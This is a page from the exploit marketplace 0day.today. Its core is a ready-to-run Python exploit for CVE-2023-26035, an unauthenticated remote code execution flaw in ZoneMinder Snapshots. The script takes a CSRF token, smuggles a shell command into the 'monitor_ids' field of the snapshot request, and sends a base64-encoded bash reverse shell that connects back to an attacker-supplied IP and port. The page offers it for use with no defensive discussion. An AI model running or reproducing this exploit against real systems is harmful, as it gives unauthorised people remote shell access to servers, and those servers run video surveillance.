0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ZoneMinder Snapshots < 1.37.33 - Unauthenticated Remote Code Execution Exploit
Author
Risk
![](/img/risk/critlow_4.gif)
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
import re import requests from bs4 import BeautifulSoup import argparse import base64 # Exploit Title: Unauthenticated RCE in ZoneMinder Snapshots # Date: 12 December 2023 # Discovered by : @Unblvr1 # Exploit Author: Ravindu Wickramasinghe (@rvizx9) # Vendor Homepage: https://zoneminder.com/ # Software Link: https://github.com/ZoneMinder/zoneminder # Version: prior to 1.36.33 and 1.37.33 # Tested on: Arch Linux, Kali Linux # CVE : CVE-2023-26035 # Github Link : https://github.com/rvizx/CVE-2023-26035 class ZoneMinderExploit: def __init__(self, target_uri): self.target_uri = target_uri self.csrf_magic = None def fetch_csrf_token(self): print("[>] fetching csrt token") response = requests.get(self.target_uri) self.csrf_magic = self.get_csrf_magic(response) if response.status_code == 200 and re.match(r'^key:[a-f0-9]{40},\d+', self.csrf_magic): print(f"[>] recieved the token: {self.csrf_magic}") return True print("[!] unable to fetch or parse token.") return False def get_csrf_magic(self, response): return BeautifulSoup(response.text, 'html.parser').find('input', {'name': '__csrf_magic'}).get('value', None) def execute_command(self, cmd): print("[>] sending payload..") data = {'view': 'snapshot', 'action': 'create', 'monitor_ids[0][Id]': f';{cmd}', '__csrf_magic': self.csrf_magic} response = requests.post(f"{self.target_uri}/index.php", data=data) print("[>] payload sent" if response.status_code == 200 else "[!] failed to send payload") def exploit(self, payload): if self.fetch_csrf_token(): print(f"[>] executing...") self.execute_command(payload) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('-t', '--target-url', required=True, help='target url endpoint') parser.add_argument('-ip', '--local-ip', required=True, help='local ip') parser.add_argument('-p', '--port', required=True, help='port') args = parser.parse_args() # generating the payload ps1 = f"bash -i >& /dev/tcp/{args.local_ip}/{args.port} 0>&1" ps2 = base64.b64encode(ps1.encode()).decode() payload = f"echo {ps2} | base64 -d | /bin/bash" ZoneMinderExploit(args.target_url).exploit(payload) # 0day.today [2024-07-08] #